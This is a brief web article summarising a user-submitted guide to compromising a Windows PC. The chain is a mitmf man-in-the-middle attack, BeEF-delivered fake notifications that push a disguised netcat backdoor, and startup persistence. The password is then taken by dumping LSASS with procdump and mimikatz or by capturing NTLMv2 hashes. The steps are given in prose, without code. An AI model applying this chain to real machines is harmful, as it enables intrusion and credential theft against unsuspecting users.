Hack Windows PC
In this article, Masschelein Steven shows how to hack Windows PC by backdooring it to get NTLMv2 hash and thus getting Windows password. Masschelein written the following description regarding this vulnerability and exploit:
You now can execute it in 2 ways. I prefer the second part from number 4.
The basic is, I’ve made a vbs script that calls netcat and makes a backdoor on a victim PC. I’ve masked the netcat EXE and the vbs script by making an executable file. I’m doing a man in the middle attack with mitmf and using beef to hook the victim's browser. If we get a hooked browser, then we send the executable through a fake notification bar. If the victim then executes the executable, we now have a netcat backdoor.
The second attack is based on the same principle, do a man in the middle attack with mitmf and send an executable with beef. This time it’s a little different. I’ve had to tweak the python script from mitmf so that the samba server doesn’t start. I’ve made a share on my attacker machine that grands everyone access to that share, then we start Wireshark to get the NTLMv2 hash. Then again the victim browses the internet, we send a fake notification bar. The victim runs our EXE, and we have again a netcat backdoor. Then we make a network share to our shared folder via the command prompt we got. Then we stop the Wireshark capture. We make a new folder in the %APPDATA% folder to copy our second executable file that we have placed in our shared folder. Then, if the file is copied, we make it auto-start on startup so that we have a persistence backdoor. As a final attack, we connect to our network share, we execute the program procdump so that we have a memory dump of the LSASS and disconnect the network drive.
Then we load the mini-dump in mimikatz, and we have the plaintext password.
We also can get the NTLMv2 hash from Wireshark, which is also explained in the document.
> This is a user submitted post that explains in great length on backdooring a PC and getting Windows password & NTLMv2 hash. If you are interested, download a copy of the PDF file for references from the link below.